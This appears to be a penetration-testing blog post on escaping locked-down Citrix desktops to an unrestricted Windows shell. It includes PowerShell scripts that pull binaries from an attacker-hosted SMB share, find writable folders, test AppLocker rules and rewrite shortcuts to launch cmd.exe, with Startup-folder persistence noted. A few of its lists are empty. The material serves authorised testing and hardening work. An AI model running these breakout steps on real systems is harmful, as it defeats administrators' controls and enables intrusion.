Windows Citrix Breakout

Citrix (Virtual Apps and Desktops, formerly XenApp/XenDesktop) publishes applications and full desktops to users over the ICA protocol. The published session is normally locked down with group policy, AppLocker and similar controls to minimise what a malicious staff member or a compromised account can do. Administrators can block users from reaching applications such as cmd.exe or powershell.exe. In an environment with only minimal hardening we can still find those binaries with search but cannot run them; in a restrictively locked-down environment the search returns nothing at all. A breakout is the process of escaping those restrictions to an unrestricted shell on the underlying Windows host.

Opening C:\Windows\System32 through File Explorer usually produces an error, because a group policy restriction blocks direct access to the drive and its system directories.

There are plenty of ways to break out of a Citrix environment; this post goes through the following:

  1. Abusing dialog boxes / bypassing path restrictions
  2. Alternate explorers
  3. Help menus
  4. Accessing SMB shares
  5. Environment variables
  6. Bypassing write restrictions
  7. Bypassing executable restrictions
  8. Modifying existing shortcuts
  9. Script execution
  10. RDP / Citrix hotkeys

1. Abusing Dialog Boxes

Trying to browse to folders such as C:\Users or C:\Windows\System32 in File Explorer results in an error, because a group policy is in place that restricts users from browsing the C:\ drive through File Explorer.

Dialog boxes offer a way around this. Plenty of desktop applications have Open/Save dialogs that let the user navigate the file system, and those dialogs are not necessarily covered by the restriction placed on Explorer.

 Accessing any application that uses a dialog box can give us a way to bypass the restriction. This can be tools such as

Running any of these applications gives us a dialog box in which we can browse for files and folders on the system. We can also type a path directly into the dialog's File name field, including a UNC path. UNC (Universal Naming Convention) is the format Windows uses to address network resources: \\server\share\folder\file. The same syntax works against the local machine (\\localhost\<share>), so locations that Explorer refuses to browse can often be reached this way.

2. Alternate Explorer

Where group policy restricts File Explorer itself, alternative file managers such as Q-Dir and Explorer++ can bypass the restriction, since it is enforced by the Explorer shell rather than by the file system. They also let us copy files from an SMB share when Explorer would refuse to.

Note: Explorer++ is recommended because it is portable and runs directly without installation.


https://explorerplusplus.com/

Similarly, if we cannot run the default Registry Editor (regedit.exe), portable registry editors can be used instead, such as:

https://sourceforge.net/projects/simpregedit
https://sourceforge.net/projects/uberregedit
https://sourceforge.net/projects/sre/

3. Help Menus

Help menus come in many forms, but application help menus and the generic "Windows Help and Support" window are particularly handy.

These menus often contain links and shortcuts to other applications, such as Command Prompt or Control Panel, and following such a link launches the target application from within the help window.

4. SMB Shares

An SMB share can be hosted on the attacker's side to serve applications such as a command prompt, portable registry editors, and so on.

To host the share we can use Impacket's smbserver (impacket-smbserver). On the client side, net use connects to the share, and copy pulls the desired binaries onto the target.
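The whole procedure end to end, as an added example that is not part of the original post: the attacker-side server command sits in the comment, and the client side is run from the locked-down session in PowerShell. The host name SMBHOST, the share name, the credentials and the file names are assumptions.

```powershell
# Attacker side (Linux), assumed to be running before the client steps:
#   impacket-smbserver share /tmp/share -smb2support -username user -password pass

$Server   = 'SMBHOST'   # hypothetical attacker host name or IP
$Share    = 'share'
$User     = 'user'
$Password = 'pass'
$Dest     = $env:TEMP   # usually still writable in a locked-down session

# Authenticate to the share without assigning a drive letter, so nothing new
# shows up in Explorer's (restricted) drive list. Syntax: net use \\srv\share pass /user:name
$unc = "\\$Server\$Share"
net use $unc $Password "/user:$User" | Out-Null
if ($LASTEXITCODE -ne 0) { throw "net use failed for $unc" }

# Pull the binaries we staged on the share (names are assumptions)
foreach ($file in 'cmd.exe', 'Explorer++.exe') {
    Copy-Item -LiteralPath (Join-Path $unc $file) -Destination $Dest -Force
    Get-Item -LiteralPath (Join-Path $Dest $file) | Select-Object Name, Length, LastWriteTime
}

# Tear the connection down when done; the copied files stay in $Dest
net use $unc /delete | Out-Null
```

If a drive letter is acceptable, `net use Z: \\SMBHOST\share` makes the share browsable from the dialog-box tricks above as well; the letterless form is quieter.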

5. Environment Variables

Environment variables help where only minimal hardening is in place. Direct access to directories such as C:\ may be denied, but typing a variable such as %SystemRoot% or %TEMP% into the Run dialog (Win+R) or a file dialog expands it to the real path, and symbolic links or junctions placed in a folder we can reach can point back into the restricted directories. File protocol handlers (for example file:///C:/Windows/System32/ entered in a browser or help window) can likewise open locations and applications that would otherwise be unavailable.

6. Bypassing Write Restrictions

This matters when we want to run our own binaries on the system or write data to files for later use. Temporary folders such as TEMP are the first place to look; the %TEMP% variable (or $env:TEMP in PowerShell) gives its location.

TIP: Sysinternals accesschk.exe (for example accesschk.exe -uwdqs Users C:\) lists directories that the current user's groups can write to.
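When accesschk.exe cannot be brought onto the box, the same check can be done with built-in PowerShell. The script below is an added example, not code from the original post: it probes a set of starting directories and their immediate children by creating and deleting a throwaway file, which catches deny ACEs and special folders that a plain ACL read would miss. The starting roots are assumptions.

```powershell
# Added example: find directories the current user can write to.
function Find-WritableDirectory {
    param(
        [string[]] $Root = @(
            $env:TEMP,                 # almost always writable, so it comes first
            $env:LOCALAPPDATA,
            "$env:SystemRoot\Temp",
            'C:\ProgramData',
            'C:\'
        ),
        [int] $Depth = 1               # how far below each root to look
    )

    $seen = @{}
    foreach ($r in $Root) {
        if (-not $r -or -not (Test-Path -LiteralPath $r)) { continue }
        $dirs = @(Get-Item -LiteralPath $r) +
                @(Get-ChildItem -LiteralPath $r -Directory -Depth $Depth -Force -ErrorAction SilentlyContinue)
        foreach ($dir in $dirs) {
            if ($seen.ContainsKey($dir.FullName)) { continue }
            $seen[$dir.FullName] = $true

            # Create-then-delete is the reliable test: an ACL read can show Write
            # while an inherited deny ACE or a protected folder still blocks us.
            $probe = Join-Path $dir.FullName ('probe_' + [guid]::NewGuid().ToString('N') + '.tmp')
            try {
                [IO.File]::WriteAllText($probe, '')
                Remove-Item -LiteralPath $probe -Force -ErrorAction SilentlyContinue
                [pscustomobject]@{ Path = $dir.FullName; Writable = $true }
            } catch {
                # Access denied (or read-only medium): not a candidate, move on
            }
        }
    }
}

Find-WritableDirectory | Format-Table -AutoSize
```

Every directory listed is somewhere a staged binary, a .lnk or a script can be dropped; whether it can also be executed from there is the separate question covered in section 7.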

7. Bypassing Executable Restrictions

These restrictions are usually implemented with allow lists or deny lists (for example AppLocker or Software Restriction Policies) that filter on:
1. File names
2. File extensions
3. Path or regex patterns
4. Other attributes such as file hash or publisher signature

We can often bypass them by renaming our file or by using a tool with an extension that is allowed.

Example: if .exe is denied, we can try to get the same result from a .ps1 script.

But if a careful administrator has built the restriction as an allow list keyed on publisher or hash rather than on name or path, it is very hard, if not impossible, to bypass.
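Before guessing, it pays to read what the policy actually keys on and to ask it directly whether a candidate would run. The script below is an added example, not code from the original post; it needs the AppLocker PowerShell module (Windows 10/11 Enterprise or Server), and the test files it places under $env:TEMP are fixtures created here with assumed names.

```powershell
# Added example: inspect the effective AppLocker policy and test candidate paths.
Import-Module AppLocker -ErrorAction Stop

# 1. What does the effective (local + domain) policy key on?
[xml]$xml = Get-AppLockerPolicy -Effective -Xml
$xml.AppLockerPolicy.RuleCollection | ForEach-Object {
    $collection = $_
    foreach ($rule in $collection.ChildNodes) {
        [pscustomobject]@{
            Collection  = $collection.GetAttribute('Type')             # Exe, Script, Msi, Dll, Appx
            Enforcement = $collection.GetAttribute('EnforcementMode')  # Enabled, AuditOnly, NotConfigured
            RuleType    = $rule.LocalName                              # FilePathRule, FilePublisherRule, FileHashRule
            Action      = $rule.GetAttribute('Action')                 # Allow or Deny
            Name        = $rule.GetAttribute('Name')
        }
    }
} | Format-Table -AutoSize

# 2. Fixtures (assumed names): the system cmd.exe copied into TEMP, and a
#    script that launches it, to compare the Exe and Script collections.
$src = "$env:SystemRoot\System32\cmd.exe"
$exe = Join-Path $env:TEMP 'cmd.exe'
$ps1 = Join-Path $env:TEMP 'tool.ps1'
Copy-Item -LiteralPath $src -Destination $exe -Force
Set-Content -LiteralPath $ps1 -Value 'Start-Process cmd.exe'

# 3. Ask the policy what it would decide for the current user
Get-AppLockerPolicy -Effective |
    Test-AppLockerPolicy -Path $src, $exe, $ps1 -User "$env:USERDOMAIN\$env:USERNAME" |
    Select-Object FilePath, PolicyDecision, MatchingRule |
    Format-Table -AutoSize

# A path rule scoped to %WINDIR% allows $src and denies the TEMP copy; a publisher
# rule for Microsoft-signed code allows both; the .ps1 is judged by the Script
# collection, which is often left unconfigured when only Exe rules exist.
Remove-Item -LiteralPath $exe, $ps1 -Force -ErrorAction SilentlyContinue
```

A PolicyDecision of Denied next to a FilePathRule is the renaming/relocation case the text describes; Denied next to a FilePublisherRule or FileHashRule is the careful-admin case, and moving or renaming the file will not help.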

8. Modifying Existing Shortcuts

If we can access a shortcut (.lnk) we can run an application of our choice. Windows resolves the shortcut's target path when the shortcut is launched, so changing that path makes the shortcut execute a different binary.

Right-click the shortcut > Properties > Shortcut tab > Target, and change the target to the desired binary.

Where no shortcut is available, we can transfer a .lnk file over an SMB share or create a new one with PowerShell.

Note: modifying a shortcut the user runs regularly also gives quick persistence, although it is not the best way to achieve it.
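Creating and rewriting shortcuts from PowerShell, as an added example that is not part of the original post: it uses the WScript.Shell COM object, which both reads existing .lnk files and writes new ones. The folders inspected and the shortcut name under $env:TEMP are assumptions; cmd.exe is only the illustrative target.

```powershell
# Added example: inspect existing shortcuts, then create one that launches cmd.exe.
$shell = New-Object -ComObject WScript.Shell

function Get-ShortcutTarget([string] $Path) {
    $lnk = $shell.CreateShortcut($Path)   # opens the existing .lnk read/write
    [pscustomobject]@{
        Shortcut   = $Path
        Target     = $lnk.TargetPath
        Arguments  = $lnk.Arguments
        WorkingDir = $lnk.WorkingDirectory
    }
}

function Set-ShortcutTarget {
    param(
        [string] $Path,             # full path ending in .lnk; created if absent
        [string] $Target,
        [string] $Arguments = ''
    )
    $lnk = $shell.CreateShortcut($Path)
    $lnk.TargetPath       = $Target
    $lnk.Arguments        = $Arguments
    $lnk.WorkingDirectory = Split-Path -Parent $Target
    $lnk.Save()                     # writes the .lnk to disk
}

# 1. Read-only survey of shortcuts the user can already reach (assumed locations)
$roots = "$env:USERPROFILE\Desktop", "$env:APPDATA\Microsoft\Windows\Start Menu"
Get-ChildItem -Path $roots -Filter *.lnk -Recurse -ErrorAction SilentlyContinue |
    ForEach-Object { Get-ShortcutTarget $_.FullName } |
    Format-Table -AutoSize

# 2. Our own shortcut in a writable folder; double-clicking it launches a shell
$mine = Join-Path $env:TEMP 'Notepad.lnk'
Set-ShortcutTarget -Path $mine -Target "$env:SystemRoot\System32\cmd.exe" -Arguments '/k whoami'
Get-ShortcutTarget $mine
```

The same Set-ShortcutTarget call pointed at an existing .lnk rewrites its target in place, which is the Properties > Target edit from above done without the GUI; the persistence variant is the same file saved into $env:APPDATA\Microsoft\Windows\Start Menu\Programs\Startup.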

9. Script Execution

When script extensions such as .bat, .vbs and .ps1 are associated with their interpreters so that opening the file runs its code, we can use scripts to download files, upload files, execute any binary, and so on.

We create a new file with one of those extensions, write the code that executes the desired binary or performs the desired action, and simply run it.

PowerShell has an execution policy, a safety feature that controls whether users can load configuration files such as the PowerShell profile, whether scripts run at all, and whether they must be digitally signed before they can run.

We can check the execution policy for every scope and change it for the current user:

PS C:\> Get-ExecutionPolicy -List
PS C:\> Set-ExecutionPolicy -Scope CurrentUser Unrestricted

Note: without -Scope, Set-ExecutionPolicy targets LocalMachine and needs administrator rights. A policy set by Group Policy (shown as MachinePolicy or UserPolicy in the -List output) overrides every other scope, but it only gates script files: commands typed interactively or passed with -Command are not affected, which is why Microsoft documents the execution policy as not being a security boundary.

For Further Details : https://learn.microsoft.com/en-us/powershell/module/microsoft.powershell.security/set-executionpolicy?view=powershell-7.4

TIP: Tools such as PowerSploit include scripts that can come in handy: https://github.com/PowerShellMafia/PowerSploit

10. RDP & Citrix Hotkeys

RDP and Citrix both define their own hotkeys that map to operating system key combinations. We can use these hotkeys to bypass restrictions, for example to open the Windows Security dialog (the Ctrl+Alt+Del screen) or to display Task Manager.

Remote Desktop Hotkeys:

Citrix ICA Hotkeys:

I hope you enjoyed this blog, see you in the next one. Ciao!